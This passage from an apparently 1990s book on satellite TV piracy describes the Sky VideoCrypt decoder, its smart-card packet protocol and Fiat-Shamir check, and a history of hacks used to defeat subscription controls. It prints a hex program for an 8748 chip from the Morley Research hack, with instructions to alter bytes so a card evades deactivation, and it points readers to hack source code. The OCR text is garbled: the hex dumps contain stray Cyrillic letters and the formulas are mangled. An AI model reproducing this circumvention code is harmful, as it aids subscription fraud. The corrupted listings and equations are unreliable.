The results would, hypothetically, set a flag in the program. Now what 
happens if the hackers could rewrite the 8052 program replacing the ZKT 
with a sequence of loops that provided a similar delay? To put it simply it 
defeats the purpose of ZKT. Of course rewriting the 8052 is nothing new to 
hackers. The KENtucky Fried Chip and the very first versions of the Ho Lee 
Fook proved that. 


It is difficult to believe that the people responsible for the overall design of 
the VideoCrypt system could have envisaged the forces massed against 
them. Perhaps they really believed that they had invented an unhackable 
system. Though the overall design of the VideoCrypt decoder is good, you 
tend to get the feeling that the people who designed the operating system 
and implemented the authentication scheme were most definitely not 
hackers. 


Perhaps some of the problems that plagued the VideoCrypt-! design have 
been fixed in the VideoCrypt-ll decoder. There were some interesting 
claims made on the improved security of the system. Again the 8052 and 
the 6805 chips in that decoder have been popped and the programs are 
currently undergoing analysis. 


The Secure Processor: 


The real processing heart of the Sky decoder is the ZC404044 or in later 
versions the ZC404047. The earlier decoders have an eight pin 9306 
EEPROM. The later versions incorporate the EEPROM data on the 
ZC404047. The control program is held in masked ROM and as such is very 
difficult to read. However it was not impossible to read. In fact popping this 
chip was an essential part of the hack. 


The first problem here was to identify the chip. The incriminating text on the 
chip proved that the ZC404044 was a Motorola microcontroller. ZC was a 
prefix generally used for customised versions. There was one other way of 
getting confirmation - phone Motorola, the manufacturers of the chip, and 
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Fiat Shamir Zero Knowledge Test Іп Operation? 
RESET: 3F FA 11 25 05 00 01 BO 02 3B 36 4D 59 02 81 80 


DCDR 72: 
CARD 70: 
CARD 7A: 


CARD 7C: 
DCDR 74: 


CARD 78: 
CARD 7A: 


CARD 7C: 
CARD 7E: 


DCDR 80: 
CARD 82: 


CARD 70: 
DCDR 74: 


00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 

D8 53 45 41 53 4F 4E 37 20 56 31 43 33 20 20 20 
30 30 3A 34 38 20 20 20 20 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

E8 42 ЗА 20 4B 1E 01 FB 7E 86 78 AA AB AD АЕ B2 
B5 B9 BB BC 00 00 00 00 00 00 00 DD FF 9E OC CE 

D3 5B 02 60 B9 65 6B OD 

80 53 45 41 53 4F 4E 37 20 56 31 43 33 41 44 55 

4C 54 43 48 41 4E 4E 45 4C 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
01 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 

EO 42 ЗА 20 55 74 01 ЕВ 7E 86 78 E2 ЕЗ E4 E5 E6 


Е7 Е9 EA 00 00 00 00 00 00 Е9 DD 33 D2 58 


Тһе datasnatch above shows the decoder requesting the card to 
authenticate itself. The card is a pirate one (actually the DDT running 
on a PC). As can be seen the ZKT fails but the decoder does not shut 
down. The decoder continued to decode the picture. The card identity 
number returned by the pirate card was 00 00 00 00 00 00. The 
decoder should have at least recognised this evidently false identity 


number. 
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ask them about the IC. The ZC404047 designation was replaced by a rather 
generic Thomson number but the fact that the chip was tracked down 
helped. It was a mask ROM version of a 6805 microcontroller. 


The function of the 6805 is to act mainly as the over the air data 
demodulator. This information is actually given in the patent application 
though the specific chip type is not mentioned. It also passes the relevant 
data packets to the 8052 housekeeper. 


Again the patent application is very specific about the actual traffic and 
protocol. It even gives the waveforms associated with the procedures. The 
main data packet passed to the 8052 is the 32 byte 74h packet. 


Much of the on screen messaging is controlled by the 6805. It is effectively 
the main processor of the decoder. It also generates a new seed for the 
PRNG in the custom logic chip at the start of each field. The eight byte 
decryption key is apparently combined with the frame counter to produce 
these seeds. 


The Custom Logic 


TC110G03AP is custom logic. It handles the control of the video descram- 
bling circuitry. This is also the most likely area for the PRNG. On some of 
the later versions of VideoCrypt decoders this part is labeled TCE PTV-2. 
The TCE possibly standing for Thomson Consumer Electronics. This IC 
also handles the clock generation for the whole decoder. The IC's clock is 
derived from a 28 MHz crystal. 


According the to the information given in the VideoCrypt brochures, the 
PRNG or Pseudo Random Sequencer was sixty stages long. This is a very 
convenient length. As the eight byte hash function output carries the 
reseeding value and a possibly four status flags which are apparently 
unused. 


The exact nature of the PRNG is not known yet. The chip also includes the 
multiplexing control circuitry. This generates the control signals for the video 
storage lines and switching. 


The Video Descrambler 


The video section of the VideoCrypt decoder is elegantly simple. The 
scrambled video is digitised by a TDA8703 ADC. This turns the video into a 
sequence of 8 bit words. The digitised video is then fed to a set of two FIFO 
memories. FIFO stands for first in first out. These ICs are capable of storing 
910 8 bit words each. 
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Each FIFO holds one segment of the line so that reassembling the video is 
merely a question of switching between the two FIFOs when clocking out 
the data. The descrambled digitised video, with the segments in the correct 
order, is fed to a TDA8702 DAC. 


The multiplexing and latching is controlled by the custom logic IC. The 
analogue video is then fed to the output stage. This stage is a discrete 
transistor design. The video signal is clamped and the on screen graphics 
are added. The resulting signal is filtered before being routed to the SCART 
connector or back into the receiver. 


The VideoCrypt-1 Card Protocol 


There is a finite number of packet types in the VideoCrypt system. After a lot 
of observation and experimentation, the function of each packet is almost 
completely known. Some areas such as the card addressing have changed 
over the different card issues. The 09 issue introduced a simple month code 
based encryption on the 74h packet. 


When compared with a system like EuroCrypt-M, VideoCrypt is indeed a 
very Sparse one. There are only ten recognised packet types in use. At this 
stage it is not known if the VideoCrypt Il protocol has any additional packet 
types. However the utilisation of the packets in the VideoCrypt system is 
many respects more elegant. 


e Instruction: 70h 
Direction: Card to Decoder 
Length: 6 Bytes 
Contents: Card Identification Number 
Each smart card has its own serial number. This serial number is six bytes 


long and is split into three areas: the card issue byte, the card identification 
number and the checksum. 


The card issue is represented by a single byte. The high nybble always 
seems to be 2. This may indicate that the card type is smart rather than a 
simple memory card. The low nybble gives the issue number. The current 
issue is OA and the last issue was 09. The next issue will be OB. 


The second area is the card identification area. This is a four byte number 
that contains the card identity. The last area is a checksum for the card 
identity. 
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ө Instruction: 72h 
Direction: Decoder to Card 
Length: 16 Bytes 
Contents: Previous Card ID, PPV and Tiering Information 


When a card is inserted into the decoder, the decoder will send a message 
to the card containing the four bytes of the card ID and other information. 
The other information probably has to do with the authorisation level of the 
card, the amount of PPV tokens remaining and whether the card is being 
chained. 


The chaining process was designed so that each decoder would be 
imprinted with a card serial number and to allow the credits or tokens 
remaining in old cards to be transferred to the new subscriber cards. The 
system was designed when EPROM cards were the dominant form of smart 
cards. The chaining process does not appear to be used in Europe. 


ө Instruction: 74h 
Direction: Decoder to Card 
Length: 32 Bytes 
Contents: Message block (addressing & key data) 


This is the workhorse of the VideoCrypt system. This message packet 
carries all of the card turn on and turn off codes. It is also used as the data 
for the hash function that generates the decryption key. Since the transition 
from the 09 to the 10, (0A), card the packet structure of the 74h has not 
been completely established. The information below relates to the 09 
packet structure. 


The data in this packet has a 27 - 4 - 1 structure. The first twenty seven 
bytes contain the decoder flags, the card addressing instructions, the 
channel identifier and the card addresses affected by this packet. The next 
four bytes are a hash function checksum. When the packet is processed by 
the hash function, part of the results in stages 28, 29, 30 and 31 should 
equal the bytes in these checksum bytes. The card will reject packets that 
do not have a valid checksum. The function of the checksum is to prevent a 
chosen plaintext attack on the hash function or a third party authorisation of 
a smart card. Of course when the 09 hash algorithm was compromised, the 
whole access control management system collapsed as it was possible to 
emulate the control messages from the headend to turn on and upgrade 
cards. 
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The final byte is a packet checksum. The value of this byte is that required 
to bring the sum of the bytes in the packet to a multiple of 256. 


Byte 0 in this packet carries the decoder flags. It effectively tells the decoder 
how the packet is to be handled. The high nybble identifies the type of 
scrambling in use. A value of Cxh indicates that the channel is not 
scrambled. A value of Exh or Fxh indicates that the channel is hard 
scrambled. The Dxh value may indicate a free access mode of scrambling. 
The value x8h as the low nybble indicates that the packet is to be used to 
generate a new decryption key. The value хОһ indicates that the packet is 
an information packet and is not to be used to generate a new key. 


e Instruction: 76h 
Direction: Decoder to Card 
Length: 1 Byte 
Contents: The Authorise button has been pressed 
This packet instructs the card that the Authorise button on the decoder has 


been pressed. If the programme is a Pay Per View programme then the 
card will deduct the correct number of tokens from the PPV reservoir. 

This instruction was used by hackers during the lifetimes of the 07 and 09 
hacks. When the Authorise button was pressed, the pirate card would cycle 
through all of the fixes for known ECMs stored in the card. 

This command is now a vestige of more naieve times when VideoCrypt was 
considered secure. Impulse PPV with a token resevoir on the card is now a 
thing of the past as the security of the card cannot be guaranteed. Sky's first 
public PPV event was a pre-booked event where the subscriber had to ring 
the subscriber management centre to have the card authorised over the air. 


e Instruction: 78h 
Direction: Card to Decoder 
Length: 8 Bytes 
Contents: The Decryption Key 


This is the eight byte decryption key generated by the hash function in the 
smart card. This key is passed to the Pseudo Random Number Generator 
in the Custom Logic IC. Only 60 Bits of this result is used to seed the 
PRNG. 
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ө Instruction: 7Ah 
Direction: Card to Decoder 
Length: 25 Bytes 
Contents: On Screen Message data 
The data in this packet is the text to be displayed on the screen. The text is 
displayed on screen in two rows of twelve characters. Depending on the 
state of the bits in the first byte, the message can be suppressed or shown. 
Currently on some of the Sky channels, the message “THIS PRO- 
GRAMME 15 BLOCKED” is present but not shown on the screen. This 


indicates that the present 09 version of VideoCrypt is already being set for 
PPV on Sky channels. 


e Instruction: 7Ch 
Direction: Card to Decoder 
Length: 16 Bytes 
Contents: Card ID, PPV and Tiering information 


This packet of information appears to be the card ID, PPV and Tiering 
information. The fact that this message packet always precedes the Fiat 
Shamir ZKT sequence could indicate that this information packet is used in 
the ZKT. 


e Instruction: 7Eh 
Direction: Card To Decoder 
Length: 64 Bytes 
Contents: Fiat Shamir ZKT X Value 


This packet of data contains the X response from the card. The response is 
the result of X-R? mod N where R is an arbitrary number. Though it is not 
yet known this number R may be taken from the code table. 


e Instruction: 80h 
Direction: Decoder to Card 
Length: 1 Byte 
Contents: The Q Flag for the Fiat Shamir ZKT 


In the Fiat Shamir ZKT protocol used in the VideoCrypt system there are 
two possible values - 00h and 01h. This byte tells the card how to calculate 
the response for the Fiat Shamir Zero Knowledge Test. 
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e Instruction: 82h 
Direction: Card to Decoder 
Length: 64 Bytes 
Contents: The Card response for the Fiat Shamir ZKT 
Again the nature of this response depends on whether the Q Byte was 00h 
or 01h. This flag tells the card to generate the response Y. If the Q Byte is 
00h then this response would be Y= R. If the Q Byte is 01h then the 


response would be Y= (R*S) mod N. R is a number from a table in the smart 
card and S is the card serial number. 


The card would be authenticated by the decoder if the following results are 
obtained: 

Y?- X mod N [if Q=00h] 

Y2= (X*V) тоа М [if Q=01h] 

The decoder would have received V prior to the authentication process. 


This number V is the card identity number and S is derived from S= sqrt(V) 
mod N 


Other Instructions 


The most important instruction not listed above is the 86h command. This 
appears to be the card personalisation command and it was present in the 
09 card. It also appears to be present in the 10 card and it was used by 
hackers to activate the March 17 1996 PPV event. 


The Fiat Shamir ZKT In VideoCrypt 


As was mentioned previously, the only European channel that is apparently 
still using the ZKT as part of their datastream is The Adult Channel. The 
procedure is listed below. 


70: Card sends V (card identity number to decoder) 
7C: Card sends identification and N ? to decoder 
7E: Card sends 64 byte packet X to decoder 

80: Decoder sends Q byte to card 

82: Card sends Y response to the decoder 

70: Card sends identity number to decoder 


The sequence above would follow the model for the ZKT presented in 
chapter 6. However the public modulus N may actually be sent by the card 
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to the decoder as a part of the 7C packet. Then the Q byte would dictate the 
type of Y response and the card would send that response in the 82h 
packet. 


The problem here is that the exact structure of the 7Ch packet is not known. 
This packet may contain the public modulus N as well as part of the the card 
identity number. 


The ZKT obviously does not work on the Adult Channel. If it did it then the 
decoder would reject the pirate cards. Instead the pirate cards just keep on 
working. The ZKT packet sequence was not been seen on issue 07. It was 
used on the 09 issue to try and knock out pirate cards. However it was 
easily overcome by hackers and pirates. 


The ZKT is used more effectively in the VideoCrypt-ll specification where 
the card has to calculate a ZKT result and EXOR the seed value against this 
calculated ZKT result. This means that the card has to effectively 
authenticate itself and an algorithm and keys hack only, as used on the 07 
VideoCrypt hack does not work. The algorithm in the VideoCrypt-ll card is 
apparently the same as that used in the 07 Sky card. Of course the keys 
and baudrates are different. 


Given that the Fiat-Shamir ZKT is used so heavily in the VideoCrypt-1 and 
VideoCrypt-ll system, it is not surprising to see it being used in all of the 
other systems that News Datacom designs. The algorithm is good and once 
the protocols have been properly implemented, it is very difficult for any 
hacker to crack it successfully and repeatedly. The paper by Fiat and 
Shamir, "How To Prove Yourself" presented at Crypto '86 is widely posted 
on FTP sites and BBSes. 


The one thing that the Fiat-Shamir relies on is secret information or data. 
This is essential to the correct operation of the scheme. But the problem for 
the implementations of this algorithm, especially in the satellite television 
applications where it has been employed, is that the secret data must be 
exactly that - secret! If it is not then the authentication procedure has been 
compromised. 


This compromise resulted in the collapse of the security on the 07 Sky card. 
Had it worked properly, the decoder 8052s were buggy, the 07 Ho Lee Fook 
would not have been as successful. 


It seems that News Datacom made great play of the fact that their system 
contained this algorithm but when it came to the crunch it was the 
technology that was compromised. This goes to prove one important thing - 
it does not matter how brilliant the algorithms and authentication protocols 
are, once the technology is compromised the system is dead. The only thing 
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The VideoCrypt Hacks 


The following paragraphs briefly detail the various hacks on the VideoCrypt 
system. Each hack is greater depth later in the chapter. 


VideoCrypt is not as secure a system as it was in the eighties. Much of this 
can be blamed on the fact that hacker technology has advanced whereas 
VideoCrypt remained largely frozen in silicon. It is basically an old system 
that is being used beyond the safe lifetime limit where technology advance 
sufficiently to make a system vulnerable. 


The 07 card and probably the 06 card were reverse engineered. The 06 was 
not an economically viable hack as there was no cheap microcontroller that 
would have allowed the development of a pirate smart card. The first 
version of the 07 Ho Lee Fook demonstrated that mode of thinking. It was 
based on ап 8752 which was intended to replace the decoder's 8052. It was 
not until a few months after the initial marketing of the hack that the first 
PIC16C54 based pirate card appeared. After that, the fate of the 07 Sky 
card was plain to everyone except Sky and News Datacom. 


The 09 card and the current 10 card have been some rather good attempts 
to shore up the system. These card issues contained some very good 
elements that, had the card remained unhacked, would have made 
VideoCrypt a very secure system indeed. Unfortunately for News Datacom 
and the users of the system, the 09 and 10 cards were reverse-engineered 
and replicated by hackers and pirates. 


The first commercial hack occurred in 1990. The Morley Research hack 
was named after the company who initially marketed the hack. Unfortu- 
nately, such actions within the boundaries of the UK are illegal. Morley 
Research were persuaded to desist from marketing the hack. 


The second hack was more or less known about among hackers though it 
was never believed feasible. It was when the bizoids got hold of it that it 
became a problem for Sky. The market was flooded with cheap little voltage 
limiters that stopped the smart card memory from being programmed. The 
name of this hack was the Infinite Lives hack. It is sometimes referred to as 
the Zener Diode hack. It stopped Sky from turning off an EPROM card by 
limiting the EPROM write voltage. 


The third hack detailed is the KENtucky Fried Chip. This one was a 
departure from the hacks that preceded it. It marked the first time that the 
actual software in the VideoCrypt decoder had been used against the 
system. 
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The McCormac Hack, is one to which VideoCrypt as implemented has no 
defence. This hack is based on one of the fundamental flaws of VideoCrypt 
and indeed other smart card based systems. Of course there are some 
methods of blocking this hack but most of these methods do not seem to 
work properly with the older systems. 


The fifth hack is known as the 07 Ho Lee Fook hack. The name of this hack 
is a phonetic spelling of the response of various hackers when they were 
first told of the hack. 


This was the most effective hack that occurred on the VideoCrypt system 
up to 1993. It offered proof that News Datacom's authentication routines 
were invalid or, at least, not used. The hack was a genuine Pirate smart 
card. Of course some would have seen this as a clone card but it was not. It 
did not rely on the use of a fake or clone master identity. 


The sixth hack is known as the OMIGOD hack. It is also referred to as the 
SEASON? hack. This hack differed from all of the previous hacks in that it 
was free. The original concept behind it was that it was to restore Star Trek 
to the viewers in mainland Europe who lost it when Sky scrambled. This is a 
computer program that allows the IBM compatible to drive the decoder as a 
virtual smart card. 


The seventh hack is known as the DDT hack. Basically this is an extension 
of the OMIGOD hack. The different aspect is that it allows Delayed Data 
Transfer or Transmission. It is possible to record a scrambled program and 
then download the key stream from a BBS or an FTP site. Then by using the 
OMIGOD interface, the keystream can be used to decode the scrambled 
programme off tape. 


Another hack on the video scrambling has been achieved. It is possible to 
decode the video scrambling in real time given enough computer resources. 
This hack was carried out by Markus Kuhn, the author of the SEASON7 
hack, in Germany on a 40 RISC computer. The problem for the application 
of this hack is that not everyone has the facilities of a half a million dollar 
computer to decode the video. However it was a most elegant hack. The 
software for this hack is freely available on many internet sites and BBSes. 


With the switch from 07 to 09, most hackers and many pirates were really 
depressed. The day that Sky switched to the 09 code was named Dark 
Wednesday. Of course they did not remain depressed for long. A fragment 
of the 09 code was auctioned at the Dorchester Hotel in London. This code 
only lasted for a week but it allowed the hackers to create the most 
devastating assault on the VideoCrypt system seen so far - the Phoenix 
hack and the Genesis blockers. 
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The Phoenix hack was an intellectual experiment to try and understand how 
the subscriber management system on the VideoCrypt system worked. 
Basically it was a program written to emulate a decoder. The this decoder 
emulator, DECOEM.C, would send 74h packets to the card that would 
change the card’s authorisation level. It was based on the Dorchester code 
and proved that once the hash function and the basic authorisation 
instructions were known, valid control messages could be sent to the card. 
Of course this was purely an intellectual exercise. However others, more 
financially minded, did not see it that way and stole the Phoenix code and 
sold it to the dealers and pirates. 


The result of this was the Genesis Blocker. The Genesis Blocker incorpo- 
rated the Phoenix activation routines with the blocking routines. Of course 
this did not prevent Sky and News Datacom from hitting the cards activated 
with the Phoenix routines even when in the blockers. This was because the 
09 сага had subcommands now labeled as "nanocommands". To the, in 
retrospect, simplistic implementations of serial number search in the 
blockers, the nanocommands went right by. This was unfortunate for the 
cards as these nanocommands generally killed the activated cards. The 
biggest kill attempted by Sky in one month was over half a million cards. Of 
course by this time the next hack was ready to enter the market. 


The working version of the 09 card hack required an image of the official 
smartcard memory space. This was because News Datacom had designed 
their algorithm so that any byte in the address space could be used as an 
input to the hash function. Of course it seemed that they had ignored one 
fundamental flaw in this approach - once the algorithm and the method of 
selecting the bytes are known the card can be dumped electronically. 


The hack of dumping the card electronicaly was one of the most 
embarrassing for News Datacom. It was almost as if they read the first part 
of a two part article | wrote a few years ago on using the address space as 
the input to a hash function. In the seconds part of that article | outlined the 
weakness of the approach given what would happen if the hash algorithm 
and the method of byte selection became known. This hack became known 
as the Vampire Hack. 


Once the complete memory space of the Sky 09 card became publicly 
known, it was all over or Sky. This was December 1994 and the security of 
the 09 card had collapsed. Nothing they did from that point on had any 
major effect on the pirate cards for longer than a few hours. It would be ten 
months before they could activate the 10 card. That was ten months of 
abject piracy and of course Sky tried to make out all the time that it was not 
Such a big thing. 
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The 10 card went into operation on 31/10/1995. The day has become 
known to hackers and pirates as “Black Tuesday”. However things were not 
all that bad. The EuroCrypt channels were completely compromised and 
most people tended to watch films on the EuroCrypt channels. The reason 
for this was clear - the UK film censor had not butchered the films. With Sky, 
all of the films have been examined by the British film censors. Besides, 
these EuroCrypt channels had hardcore pornography as well. 


With the 10 card, there were many false starts and spoofs. Frequently 
blocker programs appeared on BBSes and internet sites that were 
supposed to work - they never did. Many of these blockers snatched the 
turn-on code and just replayed them to card when Sky turned it off. Of 
course the problem was that a replay hack only works until the month code 
changes. 


The first major hack on the Sky 10 card was on the PPV. The hack has 
become known as the Sam Chisum hack after the alias used by the 
anonymous uploader. This hack was circulated as a text string that was 
placed on BBSes and Internet sites about twenty four hours before the PPV 
event. Sending this string to the card with a Phoenix interface authorised the 
card for the PPV event. It does not look like Sky should try any more PPV 
events this year given that such a hack has occurred. 


Notes On Source Code 


The source code for many of the hacks described in the following pages is 
available from many of the BBSes such as Special Projects or Compusat or 
from the WWW and FTP sites listed in Chapter 5. Some of the hacks, the 
Nagra Secam decoder for example, are better suited to this form of 
distribution. 


A CD of the relevant software, together with the previous editions of the 
Black Book and other articles on scrambling systems will be available from 
the end of September 1996. The details of the availability and pricing of the 
CD will be posted on the following websites: 


http: //ww.iol.ie/~kooltek 
http: //ww.hackwatch.com/~kool tek 


It is expected that the cost of the CD will be in the region of £9 including 
postage worldwide. 
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The Morley Research Hack 


The Morley Research Hack of 1990 had Sky nervous. Someone had found 
a way to stop Sky from turning off the cards. The basic method used was 
the interception and redirection of the write routine. This was carried out 
with a circuit that was connected between the card and the card reader. 


The code and the diagram are from the original hack. This has been 
confirmed by reliable sources. This is, apparently another version. 


The software produces another card identification number for the decoder. 
A few years ago this particular hack was successful but apparently Sky 
bought a few and were able to stop the hack. 


The basis for the hack is that it tries to confuse the decoder into thinking that 
the card that it has inserted has a different identity number. 


This hack does not work anymore on the VideoCrypt-1 system as used in 
Europe. It is not known if it works on the implementations elsewhere. 


Program to be loaded into the 8748 microcontroller 


0000 0409000409000004 0080 83AF095310968299 
0008 09231339273A0410 0088 1034898ВЕ08ВСООҒҒ 
0010  1458D3AC96108A02 0090  F7AFE6951C27F7F7 
0018  F8D36F96101458D3 0098  4310393492EE8FFC 
0020  81C648FFD383C64A 00A0 53010301Ғ7431039 
0028 FFD385C64CFFD387 00A8  3492231339349234 
0030  C64EFFD389C650FF 0080 9283AF09531096B3 
0038  D38BC652FFD38DC6 0088 2315393489ВЕ08ВС 
0040  54FFD38FC6560410 00С0 OOFFF7AFE6C71C27 
0048  04E804F1241B2438 00С8  F7F7F7F743153934 
0050 243С244524492468 0000 92ЕЕСІҒС53010301 
0058 094767F6S8BEO6EE 0008  F7F7F74315393492 
0060 5ЕВЕ081478094767 00Е0 2313393492349283 
0068 FFF7AFEE63147814 00Е8 8А02231239890104 
0070 | 78F9A8FAA9FFAA83 00Ғ0 108A04BB0A1458D3 
0078 BDODED7A8A019A00 00Ғ8  8396F523FE148123 
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0100 ЕВ14812304148123 0170 8F966D23B0148123 
0108  071481230B148123 0178  1514812306148123 
0110 ҒВ148123ҒҒ1481ЕВ 0180 1614812359148104 
0118  1304108A08BB1814 0188 109A00BD07ED8D8A 
0120 58D3E6961F238514 0190  80839A00BDO9ED96 
0128  81237F1481000000 0198  8A8000839A01**** 


0130 23ҒҒ1481ЕВ300410 


0138  8A1004108A202312 
Change bytes &174, &178, &17C, 
0140  398A0104108A4004 &180, &184 to random values from 
0148  108A80BB0A1458D3 &00 to &FF to create a new card ID 
number. This will reduce the chance 
0130. `ЕС696102305148223 of the decoder receiving a deactiva- 


Instructions: 


0158 4F14B223E014B223 tion code which matches that of the 
0160  FB14B223FF14B2EB card the decoder thinks it has in- 
stalled. 


0168  6304108A801458D3 


Comments: 


The Morley Research hack was intended to be constructed without a card 
reader. In 1990, the card readers were not as easily obtained as they are 
now. The 1990 solution was to construct a makeshift card reader using an 
arrangement of connectors and a clamp that would hold the card in the 
correct position. The unit would be fitted between the card and the decoder. 
In this respect it was exactly like the Genesis blockers used with the 09 Sky 
cards. Unlike the sleek production line models available for the 09 Sky card, 
this was very much a prototype. The device could be hardwired to the 
decoder's PCB alternatively a filed down G10 PCB of the same thickness of 
a smart card could have been used. 


The circuitry in the diagram has some strange configurations. The LED 
connected to the multiplexer will dump current into the multiplexer when 
turned on. 


This hack is more remarkable for what it represents than what it actually did. 
It was the first time that the card to decoder data was attacked in a manner 
that was potentially economically viable.Fortunately for Sky and News 
Datacom, they were able to overcome this hack. Otherwise the blocker 
problem would have appeared on the market some four years earlier than it 
did. 
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The Infinite Lives Hack 


The VideoCrypt decoder was supposed to be a dumb terminal devoid of any 
great secrets. Perhaps it was but there was a very serious flaw in the cards 
prior to issue 06 - they were EPROM types. This meant that they required a 
voltage greater than 17 Volts to overwrite the card. 


Rumours started floating around among the hackers that it was possible to 
modify the decoders so that the cards could not be invalidated. It was 
therefore possible for a Sky smart card to last indefinitely or at least until the 
next ROM change. 


This hack was referred to as the “Infinite Lives Hack”. Messages appeared 
on computer bulletin boards detailing the operation. An operation which 
involved snipping a few wires, soldering a few others and installing a zener 
diode. 


Basically, the hack involved limiting the voltage on the card’s programming 
connector. The voltage on this connector had to be in the region of 21 Volts 
for the card to be reprogrammed or written to. Cutting the voltage to this 
connector would have meant that the card and therefore the decoder would 
not work. Instead, the voltage was limited to a value, typically 15 Volts which 
would allow the card to operate but would not allow the card write operation 
to be successful. 


A plethora of devices appeared on the market. The cost of these units 
ranged from about thirty pounds to over one hundred pounds. One pirate 
was Offering a sample quantity of one hundred units for about four thousand 
dollars. Plainly these devices were little more that voltage limiters but they 
exploited a serious flaw in the VideoCrypt system. The publicity information 
on some of these products also claimed that they worked on D2-MAC 
Eurocrypt. 


The Infinite Lives hack prevented the card’s EPROM memory from being 
written to and therefore Sky could not turn off the cards. On the surface this 
would not seem too a serious problem. Of course when examined in detail, 
it was a problem of devastating proportions. 


The actual problem lay with the Quickstart cards. A wonderful marketing 
invention by someone with a monumental ignorance of pay television 
security. These cards would be turned on by Sky over the air. They would 
allow a customer to walk into a shop, sign up and be authorised within a few 
hours. 


There were so many dead people signed up for Sky that every day was a 
mini Last Judgment. False names and addresses were used with a 


7-31 


7: Video Manipulative Systems 


professionalism that would impress the best spies. Even some of the 
dealers got in on the act. 


Of course most, if not all, of the Quickstart smart cards were destined for 
use in mainland Europe. The procedure up to the Infinite Lives hack was 
that the card would be authorised and then taken and kept out of a decoder 
for a month or two. Sky would send out the card identity in the blacklist at 
various times and since the card was not in a decoder it could not be 
Switched off. The blacklist is transmitted on all Sky channels for maximum 
effectiveness. 


The Infinite Lives hack caused a mushroom effect in the trade of the 
Quickstart cards in Europe. It was now possible to get a card that could not 
be switched off and was valid almost indefinitely. Normally if a Quickstart 
card in Europe gets nuked, the supplier has to provide another. The Infinite 
Lives hack meant that the risk of the cards being switched off was 
minimised. The cards held back in reserve by the suppliers were immedi- 
ately brought on to the market. 


The situation was getting out of hand and Sky were forced to act. They 
brought out a new card issue. From issue 06 onwards, cards were 
EEPROM. They incorporated a voltage tripler on the card wafer so that the 
Vpp voltage was not necessary. This solved the problem of the Inifinite 
Lives hack. Unfortunately the fools who came up with the Quickstart 
program were apparently still with Sky. 


Sky's recovery from the Infinite Lives hack was a perfect demonstration of 
the main strength of smart cards. It allows the recovery of a compromised 
system. Smart cards are not impossible to reverse engineer, it is just 
expensive and hard to do so. The periodic change of cards is more of a 
deterrent to hacking than a card change when the system is compromised. 


The amazing thing is that Sky and News Datacom had a very good 
opportunity to assess the scale of the Infinite Lives Hack and they never 
took it. 


At the Subscription Television 1992 conference a delegate from News 
Datacom said that the fault for this hack lay with the card manufacturers 
rather than News Datacom. This was a rather strange statement consider- 
ing that it would only require a few bytes of code to check whether the card 
had been written to. The same type of hack could have been used to check 
if a KENtucky Fried Chip was in operation. 


The crypto processor would have been instructed over the air to read a 
certain address in the card's memory and store the result as (A). Then it 
would have been instructed to write the new data, (B), to the address. The 
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next step would be to read the new data from that address and store the 
result as (C). 


The check is simply a series of comparisons. 
1. (A) should not equal (C) 
2. (B) should equal (C) 


The KENtucky Fried Chip 


At the time, the significance of the KENtucky Fried Chip was not realised. It 
was the starting point of the Phoenix hacks and the Genesis blockers. It 
was a replacement microcontroller for the decoder's 8052. The program іп 
the KFC would read the card's serial number and look for packets with that 
card's serial number in them. It would then block the packet from ever 
reaching the card therefore ensuring that Sky could not turn off that card. 
This also meant that the card could not be authorised for other channels 
while the KENtucky Chip was in operation. 


The name of the chip is a hacker's joke. It is named after the Sky's head of 
security Mr. Ken Crouch. Apparently he was being too successful in 
stamping out some Grey Market card operations. As a mark of respect to a 
worthy adversary, the hackers decided to name this hack the KENtucky 
Fried Chip 


VideoCipher ІІ and EuroCypher used the philosophy of the Embedded 
Secure Microcontroller. VideoCrypt relied on the Detachable Secure Micro- 
controller philosophy and reduced the decoder to the status of a dumb 
terminal. There are some good arguments on each side. 


The Embedded Secure Microcontroller approach was discredited years 
ago. VideoCipher ІІ and FilmNet's Digital Audio were hacked proving that 
the Embedded Secure Microcontroller is anything but. EuroCypher was 
BSB's system. The amount of hackers trying to hack a system is a very 
good gauge of the success of a channel. BSB was considered by the 
Blackbox Industry to be a waste of time. It was subsequently taken over by 
Sky. Of course the Detachable Secure Microcontroller approach was also 
show to be be based on less than sound principles when the Sky and 
EuroCrypt cards were hacked. 


The fatal flaw in the VideoCrypt decoder that facilitated the KFC was the 
unprotected 8052. This microcontroller handles the decoder housekeeping. 
It also handles the secure microcontroller - card interface. It is standard 
procedure to blow the read fuses in decoder microcontrollers. This prevents 
unauthorised viewing of the stored program. Strangely, the read fuses on 
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the official 8052 were not blown. In the Blackbox Industry this was looked 
upon as a screw-up of the highest magnitude. There may have been a valid 
explanation though. 


Apart from the power supply section, the commonest failed component in 
the faulty VideoCrypt decoders is the 8052. In light of recent hacks, this 
problem would have increased. It would therefore make sense if it was 
possible to replace the chip without having to purchase an official model. 


Many service centres will, in the case of a failed 8052 either replace it with 
an 8052 from a junked decoder or with an 8752 programmed with the 
program from an official 8052. Perhaps Thomson and News Datacom had 
this in mind when choosing not to blow the read fuses. Of course this might 
all be attributing foresight where bumbling happened. 


Sky and News Datacom successfully countered version 1.0 of the KFC. 
Version 1.1 was actually ready for launch when Sky issued the 07 smart 
cards. The software in the new batch was different from the previous batch. 
As а result, the version 1.0 and 1.1 KFCs did not work. 


News Datacom do not seem to have learned very much from the 
VideoCipher II fiasco. One of the KFC first hacks used a piggy back 
arrangement for the EPROM. The hacker EPROM and the official EPROM 
were mounted on a PCB with a multiplexer and a DIL socket. Whenever 
necessary the official EPROM could be switched back into circuit. 


The whole principle of the KENtucky Fried Chip was reused for the Sky 09 
blockers. However hacks such as these are only second phase hacks. 
When reliable pirate cards become available, hacks such as the blockers 
and the KFC fade into insignificance. However the theory is always waiting 
to be employed on each new card issue. 


The McCormac Hack 


The first hack on the VideoCrypt system took just fifteen seconds. Five 
seconds to work it out and ten to write it down. In terms of simplicity it was 
devastating. In terms of security it should never have happened. It had 
applications far beyond VideoCrypt. 


